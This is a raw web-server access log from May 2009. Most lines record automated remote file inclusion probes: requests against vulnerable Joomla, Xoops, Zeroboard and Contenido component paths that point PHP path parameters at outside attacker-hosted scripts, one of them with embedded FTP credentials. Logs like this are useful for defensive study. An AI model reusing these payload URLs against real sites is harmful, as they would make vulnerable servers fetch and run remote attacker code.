58.227.193.198 - - [16/May/2009:00:48:28 -0400] "GET /logs/access_log.Q108090500/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
72.52.255.82 - - [16/May/2009:00:49:39 -0400] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 239 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
72.52.255.82 - - [16/May/2009:00:49:39 -0400] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 234 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
72.52.255.82 - - [16/May/2009:00:49:51 -0400] "GET /errors.php?error=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
72.52.255.82 - - [16/May/2009:00:49:51 -0400] "GET /logs/errors.php?error=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 213 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
58.227.193.198 - - [16/May/2009:00:49:51 -0400] "GET /logs/access_log.Q109012800//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
222.122.26.5 - - [16/May/2009:00:49:52 -0400] "GET /logs/access_log.Q108090400%20%20//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
24.47.121.57 - - [16/May/2009:00:50:17 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/catalogs.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/525.18.1 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
24.47.121.57 - - [16/May/2009:00:50:17 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/catalogs.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/525.18.1 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
190.144.44.36 - - [16/May/2009:00:50:26 -0400] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 234 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
190.144.44.36 - - [16/May/2009:00:50:26 -0400] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 239 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
209.59.12.99 - - [16/May/2009:00:50:55 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
72.52.255.82 - - [16/May/2009:00:51:55 -0400] "GET /errors.php?error=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 208 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
72.52.255.82 - - [16/May/2009:00:51:55 -0400] "GET /logs/errors.php?error=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 213 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
72.52.255.82 - - [16/May/2009:00:52:30 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 249 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
72.52.255.82 - - [16/May/2009:00:52:30 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 254 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
72.30.79.49 - - [16/May/2009:00:52:48 -0400] "GET /logs/error_log.Q109051500 HTTP/1.0" 200 6964123 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
222.122.26.5 - - [16/May/2009:00:53:07 -0400] "GET /logs/access_log.Q109050800%20%20//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
193.221.119.126 - - [16/May/2009:00:53:23 -0400] "GET /logs/access_log.Q108112400/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://isportion.co.kr/kboard/lang/fatal1.txt???? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
193.221.119.126 - - [16/May/2009:00:53:23 -0400] "GET /logs/access_log.Q108090500/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://isportion.co.kr/kboard/lang/fatal1.txt???? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
72.30.79.49 - - [16/May/2009:00:53:26 -0400] "GET /logs/access_log.Q109051000 HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.79.49 - - [16/May/2009:00:52:48 -0400] "GET /logs/error_log.Q109051500 HTTP/1.0" 200 6964123 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
72.52.255.82 - - [16/May/2009:00:53:46 -0400] "GET /errors.php?error=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 208 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
72.52.255.82 - - [16/May/2009:00:53:46 -0400] "GET /logs/errors.php?error=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 213 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
222.122.26.5 - - [16/May/2009:00:54:17 -0400] "GET /logs/access_log.Q109050800//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
66.232.102.70 - - [16/May/2009:00:54:30 -0400] "GET //index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://flyozoneusa.com/tmp/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
66.232.102.70 - - [16/May/2009:00:54:30 -0400] "GET /logs/access_log.Q109030500%20%20//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://flyozoneusa.com/tmp/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
66.232.102.70 - - [16/May/2009:00:54:30 -0400] "GET /logs//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://flyozoneusa.com/tmp/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
72.52.255.82 - - [16/May/2009:00:54:32 -0400] "GET /logs/errors.php?error=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 213 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
72.52.255.82 - - [16/May/2009:00:54:32 -0400] "GET /errors.php?error=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
66.232.102.70 - - [16/May/2009:00:54:43 -0400] "GET /logs/access_log.Q109030500//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://flyozoneusa.com/tmp/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
222.122.26.5 - - [16/May/2009:00:55:21 -0400] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
222.122.26.5 - - [16/May/2009:00:55:21 -0400] "GET //components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
222.122.26.5 - - [16/May/2009:00:55:21 -0400] "GET /logs/access_log.Q109022600//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
222.122.26.5 - - [16/May/2009:00:55:29 -0400] "GET /logs/access_log.Q109050900//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
209.59.12.99 - - [16/May/2009:00:55:55 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
72.52.255.82 - - [16/May/2009:00:56:44 -0400] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 239 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
72.52.255.82 - - [16/May/2009:00:56:44 -0400] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 234 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
61.67.196.130 - - [16/May/2009:00:56:50 -0400] "GET /logs/access_log.Q108082000//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://208.98.22.241/id.txt?? HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
61.67.196.130 - - [16/May/2009:00:56:50 -0400] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://208.98.22.241/id.txt?? HTTP/1.1" 404 279 "-" "libwww-perl/5.805"
61.67.196.130 - - [16/May/2009:00:56:50 -0400] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://208.98.22.241/id.txt?? HTTP/1.1" 404 274 "-" "libwww-perl/5.805"
72.52.255.82 - - [16/May/2009:00:57:15 -0400] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 234 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
72.52.255.82 - - [16/May/2009:00:57:15 -0400] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 239 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
61.67.196.130 - - [16/May/2009:00:57:16 -0400] "GET /logs/access_log.Q108090800//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://208.98.22.241/id.txt?? HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
72.30.79.49 - - [16/May/2009:00:57:21 -0400] "GET /images/_notes/nav_store_fav_over_r1_c4.jpg.mno HTTP/1.0" 200 210 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.79.49 - - [16/May/2009:00:57:24 -0400] "GET /logs/error_log.Q109051300 HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
213.246.39.167 - - [16/May/2009:00:57:26 -0400] "GET //viewbody.html?code=http://www.shababek.de/baner.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
213.246.39.167 - - [16/May/2009:00:57:26 -0400] "GET /logs//viewbody.html?code=http://www.shababek.de/baner.txt?? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
213.246.39.167 - - [16/May/2009:00:57:26 -0400] "GET /logs/access_log.Q108121900//viewbody.html?code=http://www.shababek.de/baner.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
171.64.75.45 - - [16/May/2009:00:57:31 -0400] "GET //viewbody.html?code=http://www.shababek.de/baner.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
171.64.75.45 - - [16/May/2009:00:57:31 -0400] "GET /logs//viewbody.html?code=http://www.shababek.de/baner.txt?? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
171.64.75.45 - - [16/May/2009:00:57:31 -0400] "GET /logs/access_log.Q108121900//viewbody.html?code=http://www.shababek.de/baner.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
221.157.225.65 - - [16/May/2009:00:57:32 -0400] "GET /logs//?_zb_path=http://driji.wap.sh/id.txt?? HTTP/1.1" 200 1557 "-" "Mozilla/5.0"
221.157.225.65 - - [16/May/2009:00:57:32 -0400] "GET //?_zb_path=http://driji.wap.sh/id.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
89.223.3.98 - - [16/May/2009:00:57:38 -0400] "GET //skin/zero_vote/error.php?dir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
89.223.3.98 - - [16/May/2009:00:57:38 -0400] "GET /logs//skin/zero_vote/error.php?dir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
89.223.3.98 - - [16/May/2009:00:57:38 -0400] "GET /logs/access_log.Q109051200%20%20//skin/zero_vote/error.php?dir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
89.223.3.98 - - [16/May/2009:00:57:38 -0400] "GET /logs/access_log.Q108090400%20%20//skin/zero_vote/error.php?dir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
89.223.3.98 - - [16/May/2009:00:57:52 -0400] "GET //skin/zero_vote/error.php?dir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
89.223.3.98 - - [16/May/2009:00:57:52 -0400] "GET /logs//skin/zero_vote/error.php?dir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
89.223.3.98 - - [16/May/2009:00:57:52 -0400] "GET /logs/access_log.Q108090400%20%20//skin/zero_vote/error.php?dir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
89.223.3.98 - - [16/May/2009:00:57:52 -0400] "GET /logs/access_log.Q109051200%20%20//skin/zero_vote/error.php?dir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
89.223.3.98 - - [16/May/2009:00:57:53 -0400] "GET //skin/zero_vote/error.php?dir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
89.223.3.98 - - [16/May/2009:00:57:53 -0400] "GET /logs/access_log.Q109051200%20%20//skin/zero_vote/error.php?dir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
89.223.3.98 - - [16/May/2009:00:57:53 -0400] "GET /logs//skin/zero_vote/error.php?dir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
89.223.3.98 - - [16/May/2009:00:57:53 -0400] "GET /logs/access_log.Q108090400%20%20//skin/zero_vote/error.php?dir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
62.44.79.35 - - [16/May/2009:00:58:06 -0400] "GET /logs/access_log.Q108083000//components/errors.php?error=http://tugaspeed.info/idpriv8.txt%0D?? HTTP/1.1" 404 247 "-" "libwww-perl/5.803"
62.44.79.35 - - [16/May/2009:00:58:06 -0400] "GET //components/errors.php?error=http://tugaspeed.info/idpriv8.txt%0D?? HTTP/1.1" 404 220 "-" "libwww-perl/5.803"
62.44.79.35 - - [16/May/2009:00:58:06 -0400] "GET /logs//components/errors.php?error=http://tugaspeed.info/idpriv8.txt%0D?? HTTP/1.1" 404 225 "-" "libwww-perl/5.803"
74.52.164.18 - - [16/May/2009:00:58:08 -0400] "GET /logs/access_log.Q108121400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=ftp://delices:dfrt56@80.179.48.2/httpsdocs/v6id.txt??%0D?? HTTP/1.1" 404 279 "-" "libwww-perl/5.811"
74.52.164.18 - - [16/May/2009:00:58:09 -0400] "GET /logs/access_log.Q108121400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=ftp://delices:dfrt56@80.179.48.2/httpsdocs/v6id.txt??%0D?? HTTP/1.1" 404 279 "-" "libwww-perl/5.811"
74.52.164.18 - - [16/May/2009:00:58:09 -0400] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=ftp://delices:dfrt56@80.179.48.2/httpsdocs/v6id.txt??%0D?? HTTP/1.1" 404 252 "-" "libwww-perl/5.811"
74.52.164.18 - - [16/May/2009:00:58:09 -0400] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=ftp://delices:dfrt56@80.179.48.2/httpsdocs/v6id.txt??%0D?? HTTP/1.1" 404 257 "-" "libwww-perl/5.811"
74.52.164.18 - - [16/May/2009:00:58:09 -0400] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=ftp://delices:dfrt56@80.179.48.2/httpsdocs/v6id.txt??%0D?? HTTP/1.1" 404 252 "-" "libwww-perl/5.811"
74.52.164.18 - - [16/May/2009:00:58:09 -0400] "GET /logs/access_log.Q108072400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=ftp://delices:dfrt56@80.179.48.2/httpsdocs/v6id.txt??%0D?? HTTP/1.1" 404 279 "-" "libwww-perl/5.811"
74.52.164.18 - - [16/May/2009:00:58:09 -0400] "GET /logs/access_log.Q108072400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=ftp://delices:dfrt56@80.179.48.2/httpsdocs/v6id.txt??%0D?? HTTP/1.1" 404 279 "-" "libwww-perl/5.811"
74.52.164.18 - - [16/May/2009:00:58:09 -0400] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=ftp://delices:dfrt56@80.179.48.2/httpsdocs/v6id.txt??%0D?? HTTP/1.1" 404 257 "-" "libwww-perl/5.811"
72.52.230.168 - - [16/May/2009:00:58:17 -0400] "GET //?_zb_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
72.52.230.168 - - [16/May/2009:00:58:17 -0400] "GET /logs//?_zb_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 200 1557 "-" "Mozilla/5.0"
72.52.230.168 - - [16/May/2009:00:58:17 -0400] "GET /logs/error_log.Q109051100//?_zb_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
171.64.75.45 - - [16/May/2009:00:58:32 -0400] "GET /logs/access_log.Q108121900%20%20//viewbody.html?code=http://www.shababek.de/baner.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
62.44.79.35 - - [16/May/2009:00:59:06 -0400] "GET /logs/access_log.Q108110900//components/errors.php?error=http://tugaspeed.info/idpriv8.txt%0D?? HTTP/1.1" 404 247 "-" "libwww-perl/5.803"
171.64.75.45 - - [16/May/2009:00:59:25 -0400] "GET /logs/error_log.Q108121900%20%20//viewbody.html?code=http://www.shababek.de/baner.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
193.25.197.14 - - [16/May/2009:00:59:27 -0400] "GET //viewbody.html?code=http://www.shababek.de/baner.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
193.25.197.14 - - [16/May/2009:00:59:27 -0400] "GET /logs//viewbody.html?code=http://www.shababek.de/baner.txt?? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
193.25.197.14 - - [16/May/2009:00:59:27 -0400] "GET /logs/access_log.Q108121900//viewbody.html?code=http://www.shababek.de/baner.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
84.92.197.113 - - [16/May/2009:00:59:37 -0400] "GET /logs//components/errors.php?error=http://tugaspeed.info/fx29id.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
84.92.197.113 - - [16/May/2009:00:59:37 -0400] "GET //components/errors.php?error=http://tugaspeed.info/fx29id.txt? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
84.92.197.113 - - [16/May/2009:00:59:37 -0400] "GET /logs/access_log.Q109022600//components/errors.php?error=http://tugaspeed.info/fx29id.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
200.32.100.130 - - [16/May/2009:00:59:56 -0400] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.triton-friendlyclub.com/2009/idosiriys.txt??? HTTP/1.1" 404 243 "-" "libwww-perl/5.805"
200.32.100.130 - - [16/May/2009:00:59:56 -0400] "GET /logs/access_log.Q109011400/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.triton-friendlyclub.com/2009/idosiriys.txt??? HTTP/1.1" 404 265 "-" "libwww-perl/5.805"
200.32.100.130 - - [16/May/2009:00:59:56 -0400] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://www.triton-friendlyclub.com/2009/idosiriys.txt??? HTTP/1.1" 404 238 "-" "libwww-perl/5.805"
84.92.197.113 - - [16/May/2009:00:59:59 -0400] "GET /logs/access_log.Q108083000//components/errors.php?error=http://tugaspeed.info/fx29id.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
110.45.144.106 - - [16/May/2009:01:00:00 -0400] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
110.45.144.106 - - [16/May/2009:01:00:00 -0400] "GET //components/com_simpleboard/image_upload.php?sbp=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
110.45.144.106 - - [16/May/2009:01:00:00 -0400] "GET /logs/access_log.Q109022600//components/com_simpleboard/image_upload.php?sbp=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
110.45.144.106 - - [16/May/2009:01:00:19 -0400] "GET /logs/access_log.Q108083000//components/com_simpleboard/image_upload.php?sbp=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
72.52.255.82 - - [16/May/2009:01:00:28 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 254 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
72.52.255.82 - - [16/May/2009:01:00:28 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 249 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
72.52.255.82 - - [16/May/2009:01:00:46 -0400] "GET //components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 273 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
72.52.255.82 - - [16/May/2009:01:00:46 -0400] "GET /logs//components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 278 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
209.59.12.99 - - [16/May/2009:01:00:55 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
213.246.39.167 - - [16/May/2009:01:00:59 -0400] "GET /logs/error_log.Q108121900%20%20//viewbody.html?code=http://www.shababek.de/baner.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
72.52.255.82 - - [16/May/2009:01:01:03 -0400] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 239 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
72.52.255.82 - - [16/May/2009:01:01:03 -0400] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 234 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
200.32.100.130 - - [16/May/2009:01:01:31 -0400] "GET /logs/error_log.Q108021400/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.triton-friendlyclub.com/2009/idosiriys.txt??? HTTP/1.1" 404 264 "-" "libwww-perl/5.805"
195.226.112.50 - - [16/May/2009:01:01:33 -0400] "GET /logs/access_log.Q108121900//viewbody.html?code=http://www.somosanuncios.com/raid.txt??? HTTP/1.0" 404 239 "-" "libwww-perl/5.48"
195.226.112.50 - - [16/May/2009:01:01:33 -0400] "GET //viewbody.html?code=http://www.somosanuncios.com/raid.txt??? HTTP/1.0" 404 212 "-" "libwww-perl/5.48"
195.226.112.50 - - [16/May/2009:01:01:33 -0400] "GET /logs//viewbody.html?code=http://www.somosanuncios.com/raid.txt??? HTTP/1.0" 404 217 "-" "libwww-perl/5.48"
72.30.79.49 - - [16/May/2009:01:01:45 -0400] "GET /logs/error_log.Q109050800 HTTP/1.0" 200 4417879 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
89.223.3.98 - - [16/May/2009:01:01:56 -0400] "GET /logs/access_log.Q109051200//skin/zero_vote/error.php?dir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
89.223.3.98 - - [16/May/2009:01:01:56 -0400] "GET /logs/access_log.Q108090400//skin/zero_vote/error.php?dir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
89.223.3.98 - - [16/May/2009:01:01:57 -0400] "GET /logs/access_log.Q108090400//skin/zero_vote/error.php?dir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
89.223.3.98 - - [16/May/2009:01:01:57 -0400] "GET /logs/access_log.Q109051200//skin/zero_vote/error.php?dir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
72.30.79.49 - - [16/May/2009:01:01:51 -0400] "GET /logs/error_log.Q109050800 HTTP/1.0" 200 4417879 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
72.52.255.82 - - [16/May/2009:01:02:23 -0400] "GET //components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 273 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
72.52.255.82 - - [16/May/2009:01:02:23 -0400] "GET /logs//components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 278 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
195.226.112.50 - - [16/May/2009:01:02:24 -0400] "GET /logs/error_log.Q108121900//viewbody.html?code=http://www.somosanuncios.com/raid.txt??? HTTP/1.0" 404 238 "-" "libwww-perl/5.48"
72.52.255.82 - - [16/May/2009:01:02:27 -0400] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 234 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
